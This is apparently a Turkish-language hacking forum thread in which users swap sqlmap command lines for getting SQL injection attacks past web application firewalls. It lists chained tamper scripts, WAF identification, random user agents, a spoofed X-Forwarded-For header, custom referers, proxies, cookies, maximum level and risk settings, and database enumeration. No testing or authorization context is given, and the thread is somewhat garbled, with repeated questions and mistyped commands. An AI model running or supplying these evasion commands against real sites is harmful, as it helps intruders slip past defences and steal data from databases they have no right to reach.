Follow along with the video below to see how to install our site as a web app on your home screen.
Not: This feature may not be available in some browsers.
sondaki noktalar dahil mi?--tamper=space2commentbeetwen,appendnullbyte,charunicodeencode,randomcase,modsecurityversioned............
değil, sqlmap'de bulunan waff bypasslamak için kullanılan scriptleri verdim hangi waff olduğunu bilmiyorum ama space2comment & mode_security olan kısım yardımcı olabilir örn; swqlmap -u "http://127.1/ambatukam.php?bus=1" --level=5 --risk=3 --random-agent --batch --dbs --tamper=space2comment,between gibisindensondaki noktalar dahil mi?
forum.bugcrowd.com
http headers nasıl değişiyor acaba hocam?Merhaba,
Öncelikle WAF türünü keşfetmemiz gerekiyor. Bunun için "--identify-waf" kullanabilirsiniz.
WAF aşmak için timeslep ekleyebilirsiniz. "--time-sec=10"
Random-agent kullanabilirsiniz. "--random-agent"
HTTP Headers değiştirebilirsiniz. "-headers=X-Fowarded-For: IP"
space2comment ile düşük bant yapabilirsiniz. "--tamper='space2comment'"
Birden fazla tamper birleştirerek kullanabilirsiniz. "--tamper="between,space2comment,randomcase,hexencode,charencode,"
Tüm tamper listesini görebilmek için --list-tampers' göz atabilirsiniz.
http headers nasıl değişiyor acaba hocam?
sqlmap -u "http://example.com/vuln.php?id=1" --headers="X-Forwarded-For: 127.0.0.1" <--- sahte IP ile
sqlmap -u "http://example.com/vuln.php?id=1" --headers="User-Agent: CustomUserAgent\r\nReferer: https://example.com" <--- site ile
sqlmap -u "http://example.com/vuln.php?id=1" --random-agent <--- rastgele kullanıcı ile
sqlmap -u "http://example.com/vuln.php?id=1" --proxy="http://127.0.0.1:8080" <--- rastgele proxy ile
Cookie ve HTTP
sqlmap -u "http://example.com/vuln.php?id=1" --cookie="PHPSESSID=abcdef12345" --headers="Referer: https://example.com"